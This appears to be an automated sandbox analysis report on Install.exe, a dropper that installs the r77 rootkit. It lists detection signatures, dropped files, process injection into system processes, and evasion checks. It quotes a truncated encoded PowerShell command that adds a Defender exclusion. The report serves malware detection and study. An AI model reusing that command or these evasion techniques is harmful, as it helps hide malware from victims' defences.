Windows Analysis Report
Install.exe

Overview

General Information

Sample Name:	Install.exe
Analysis ID:	597646
MD5:	280bfd5ea1f41586ea0ef60ee44bc8db
SHA1:	57aa866f42bccbaceed938390001148323d033c1
SHA256:	a6ca5523fce6a4a43964319c35ecb868186465309e9226ab07c158519a5ef6f9
Tags:	exe
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Multi AV Scanner detection for submitted file

Multi AV Scanner detection for dropped file

Hooks registry keys query functions (used to hide registry keys)

Uses nslookup.exe to query domains

Encrypted powershell cmdline option found

Allocates memory in foreign processes

Creates files in the system32 config directory

Hooks processes query functions (used to hide processes)

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Suspicious Svchost Process

Creates a thread in another existing process (thread injection)

Hooks files or directories query functions (used to hide files and directories)

Uses schtasks.exe or at.exe to add and modify task schedules

Found suspicious powershell code related to unpacking or dynamic code loading

Writes to foreign memory regions

.NET source code references suspicious native API functions

Very long command line found

Modifies the prolog of user mode functions (user mode inline hooks)

Obfuscated command line found

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

Potential dropper URLs found in powershell memory

Antivirus or Machine Learning detection for unpacked file

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

HTTP GET or POST without a user agent

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

PE file contains strange resources

Drops PE files

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Sigma detected: Suspicious DNS Query for IP Lookup Service APIs

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Deletes files inside the Windows folder

Contains functionality to shutdown / reboot the system

Creates files inside the system directory

PE file contains sections with non-standard names

Stores large binary data to the registry

Contains functionality to query CPU information (cpuid)

Creates job files (autostart)

Contains functionality to call native functions

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Enables debug privileges

PE file does not import any functions

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

Found evasive API chain (may stop execution after accessing registry keys)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Sigma detected: Suspicious Execution of Powershell with Base64

Classification

Signatures

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\34432.exe	Avira: detection malicious, Label: HEUR/AGEN.1221921
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Avira: detection malicious, Label: HEUR/AGEN.1221921

Multi AV Scanner detection for submitted file

Source: Install.exe	Virustotal: Detection: 41%			Perma Link
Source: Install.exe	ReversingLabs: Detection: 73%

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\34432.exe	Virustotal: Detection: 34%	Perma Link
Source: C:\Users\user\AppData\Roaming\34432.exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe	Virustotal: Detection: 50%	Perma Link
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	ReversingLabs: Detection: 76%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\34432.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 22.0.nslookup.exe.140000000.2.unpack	Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.10.unpack	Avira: Label: RKIT/Agent.avskt
Source: 22.0.nslookup.exe.140000000.0.unpack	Avira: Label: TR/Injector.vwktt
Source: 22.0.nslookup.exe.140000000.8.unpack	Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.3.unpack	Avira: Label: RKIT/Agent.avskt
Source: 22.0.nslookup.exe.140000000.1.unpack	Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.4.unpack	Avira: Label: RKIT/Agent.avskt
Source: 22.0.nslookup.exe.140000000.5.unpack	Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.1.unpack	Avira: Label: RKIT/Agent.avskt
Source: 39.0.dllhost.exe.140000000.8.unpack	Avira: Label: RKIT/Agent.avskt
Source: 22.2.nslookup.exe.140000000.0.unpack	Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.5.unpack	Avira: Label: RKIT/Agent.avskt
Source: 39.2.dllhost.exe.140000000.0.unpack	Avira: Label: RKIT/Agent.avskt
Source: 39.0.dllhost.exe.140000000.12.unpack	Avira: Label: RKIT/Agent.avskt
Source: 22.0.nslookup.exe.140000000.6.unpack	Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.0.unpack	Avira: Label: RKIT/Agent.avskt
Source: 22.0.nslookup.exe.140000000.10.unpack	Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.6.unpack	Avira: Label: RKIT/Agent.avskt
Source: 22.0.nslookup.exe.140000000.12.unpack	Avira: Label: TR/Injector.vwktt
Source: 22.0.nslookup.exe.140000000.3.unpack	Avira: Label: TR/Injector.vwktt
Source: 22.0.nslookup.exe.140000000.4.unpack	Avira: Label: TR/Injector.vwktt
Source: 39.0.dllhost.exe.140000000.2.unpack	Avira: Label: RKIT/Agent.avskt

Uses 32bit PE files

Source: Install.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: Install.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: x64\Release\r77-x64.pdb source: svchost.exe
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\Install.pdb source: 34432.exe, 00000004.00000002.371180159.000000001702D000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.361388892.0000000013A39000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356979000.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.360948518.0000000013998000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000003.333426645.000000001C445000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, nslookup.exe, 00000016.00000000.330232590.0000000140000000.00000040.00000400.00020000.00000000.sdmp, nslookup.exe, 00000016.00000000.329876550.0000000140000000.00000040.00000400.00020000.00000000.sdmp, nslookup.exe, 00000016.00000002.336319632.0000000140000000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\Release\r77-x86.pdb source: powershell.exe, 00000019.00000002.430828592.000002C880212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\InstallService64.pdb source: powershell.exe, 00000019.00000002.430828592.000002C880212000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.463366324.000002C8902E9000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe
Source:	Binary string: x64.pdb source: svchost.exe
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\Release\InstallService32.pdb source: powershell.exe, 00000019.00000002.462661214.000002C890203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\InstallStager\obj\x64\Release\InstallStager.pdb source: 34432.exe, 00000004.00000002.361388892.0000000013A39000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.360948518.0000000013998000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356818562.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356782565.0000000003991000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000003.333426645.000000001C445000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.468321947.000002C8EBC93000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: N\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: ChiefKeefofficialnaxyi_crypted(6).exe, 00000002.00000002.225232923.0000000000113000.00000004.00000010.00020000.00000000.sdmp, ChiefKeefofficialnaxyi_crypted(6).exe, 00000002.00000003.224694291.0000000002672000.00000040.00001000.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.505647974.0000000000402000.00000020.00000400.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe
Source:	Binary string: RYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe

Source: C:\Users\user\Desktop\Install.exe	Code function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	1_2_00405C49
Source: C:\Users\user\Desktop\Install.exe	Code function: 1_2_00406873 FindFirstFileW,FindClose,	1_2_00406873
Source: C:\Users\user\Desktop\Install.exe	Code function: 1_2_0040290B FindFirstFileW,	1_2_0040290B
Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_0000000140006E1C FindFirstFileExW,	22_2_0000000140006E1C
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_00000001400073C8 FindFirstFileExW,	39_2_00000001400073C8
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDD0D0E4 FindFirstFileExW,	42_2_000001AFDDD0D0E4
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2BBD0E4 FindFirstFileExW,	44_2_00000240B2BBD0E4
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3D0D0E4 FindFirstFileExW,	47_2_000001CAF3D0D0E4
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF4D0E4 FindFirstFileExW,	49_2_000001B8BFF4D0E4

Networking

Uses nslookup.exe to query domains

Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\nslookup.exe C:\Windows\System32\nslookup.exe
Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\nslookup.exe C:\Windows\System32\nslookup.exe			Jump to behavior

Potential dropper URLs found in powershell memory

Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp	String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp	String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp	String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery
Source: powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmp	String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData0I
Source: powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmp	String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQueryux

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: powershell.exe, 00000008.00000002.303519748.000001FF69E80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.467492973.000002C8EBA50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000026.00000003.472356728.00000283B87D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mp
Source: powershell.exe, 00000026.00000003.472356728.00000283B87D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mpowershell-EncodedCommandQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHM
Source: AppLaunch.exe, 00000005.00000002.512763531.0000000006D47000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com4Uk
Source: Install.exe, 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Install.exe, 00000001.00000000.217633196.000000000040A000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000008.00000002.301149982.000001FF61EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 34432.exe, 00000004.00000002.356979000.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.288800846.000001FF51E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.430121118.000002C880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.477975029.00000283A06B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: AppLaunch.exe, 00000005.00000002.505647974.0000000000402000.00000020.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.codeplex.com/DotNetZip
Source: powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.298759051.000001FF53502000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.299698983.000001FF5367C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.300217713.000001FF53864000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.493191066.00000283A1A2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000003.422394060.00000283A2335000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000003.423315665.00000283A242E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.301149982.000001FF61EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown

DNS traffic detected: queries for: ip-api.com

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\Install.exe

Code function: 1_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

1_2_004056DE

System Summary

Very long command line found

Source: unknown	Process created: Commandline size = 2585
Source: unknown	Process created: Commandline size = 2578

Detected potential crypto function

Source: C:\Users\user\Desktop\Install.exe	Code function: 1_2_0040755C	1_2_0040755C
Source: C:\Users\user\Desktop\Install.exe	Code function: 1_2_00406D85	1_2_00406D85
Source: C:\Users\user\AppData\Roaming\34432.exe	Code function: 4_2_00007FFF7E401C9B	4_2_00007FFF7E401C9B
Source: C:\Users\user\AppData\Roaming\34432.exe	Code function: 4_2_00007FFF7E405C20	4_2_00007FFF7E405C20
Source: C:\Users\user\AppData\Roaming\34432.exe	Code function: 4_2_00007FFF7E401CCC	4_2_00007FFF7E401CCC
Source: C:\Users\user\AppData\Roaming\34432.exe	Code function: 4_2_00007FFF7E401D60	4_2_00007FFF7E401D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_0532148E	5_2_0532148E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_05327D90	5_2_05327D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_05321DC1	5_2_05321DC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_0532DF00	5_2_0532DF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_0532BFA0	5_2_0532BFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_0532C870	5_2_0532C870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_05320868	5_2_05320868
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_05320B48	5_2_05320B48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_05321587	5_2_05321587
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_053220F8	5_2_053220F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_0532BC58	5_2_0532BC58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_05321E71	5_2_05321E71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_05320B39	5_2_05320B39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_05320B82	5_2_05320B82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_05327A38	5_2_05327A38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_09417560	5_2_09417560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 5_2_09417570	5_2_09417570
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFF7E3F1958	8_2_00007FFF7E3F1958
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFF7E3F19B8	8_2_00007FFF7E3F19B8
Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_0000000140001000	22_2_0000000140001000
Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_00000001400011D0	22_2_00000001400011D0
Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_0000000140006C10	22_2_0000000140006C10
Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_0000000140005098	22_2_0000000140005098
Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_0000000140006E1C	22_2_0000000140006E1C
Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_000000014000AABC	22_2_000000014000AABC
Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_000000014000CAD8	22_2_000000014000CAD8
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Code function: 30_2_00007FFF7E3F4640	30_2_00007FFF7E3F4640
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Code function: 30_2_00007FFF7E3F1C9B	30_2_00007FFF7E3F1C9B
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Code function: 30_2_00007FFF7E3F1CCC	30_2_00007FFF7E3F1CCC
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Code function: 30_2_00007FFF7E3F1D60	30_2_00007FFF7E3F1D60
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Code function: 33_2_00007FFF7E401C9B	33_2_00007FFF7E401C9B
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Code function: 33_2_00007FFF7E401CCC	33_2_00007FFF7E401CCC
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Code function: 33_2_00007FFF7E401D60	33_2_00007FFF7E401D60
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_0000000140001000	39_2_0000000140001000
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_0000000140001420	39_2_0000000140001420
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_0000000140001430	39_2_0000000140001430
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_000000014000558C	39_2_000000014000558C
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_00000001400071BC	39_2_00000001400071BC
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_000000014000B2CC	39_2_000000014000B2CC
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_000000014000D2E8	39_2_000000014000D2E8
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_00000001400073C8	39_2_00000001400073C8
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDCDC4E4	42_2_000001AFDDCDC4E4
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDCE2418	42_2_000001AFDDCE2418
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDCD0800	42_2_000001AFDDCD0800
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDCE0400	42_2_000001AFDDCE0400
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDCDC2D8	42_2_000001AFDDCDC2D8
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDCD1660	42_2_000001AFDDCD1660
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDD01400	42_2_000001AFDDD01400
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDD0D0E4	42_2_000001AFDDD0D0E4
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDD13018	42_2_000001AFDDD13018
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDD11000	42_2_000001AFDDD11000
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDD0CED8	42_2_000001AFDDD0CED8
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDD02260	42_2_000001AFDDD02260
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2B8C4E4	44_2_00000240B2B8C4E4
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2B8C2D8	44_2_00000240B2B8C2D8
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2B81660	44_2_00000240B2B81660
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2B92418	44_2_00000240B2B92418
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2B80800	44_2_00000240B2B80800
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2B90400	44_2_00000240B2B90400
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2BBD0E4	44_2_00000240B2BBD0E4
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2BBCED8	44_2_00000240B2BBCED8
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2BB2260	44_2_00000240B2BB2260
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2BC3018	44_2_00000240B2BC3018
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2BB1400	44_2_00000240B2BB1400
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2BC1000	44_2_00000240B2BC1000
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3CE2418	47_2_000001CAF3CE2418
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3CE0400	47_2_000001CAF3CE0400
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3CD0800	47_2_000001CAF3CD0800
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3CDC2D8	47_2_000001CAF3CDC2D8
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3CD1660	47_2_000001CAF3CD1660
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3CDC4E4	47_2_000001CAF3CDC4E4
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3D01400	47_2_000001CAF3D01400
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3D02260	47_2_000001CAF3D02260
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3D0D0E4	47_2_000001CAF3D0D0E4
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3D13018	47_2_000001CAF3D13018
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3D11000	47_2_000001CAF3D11000
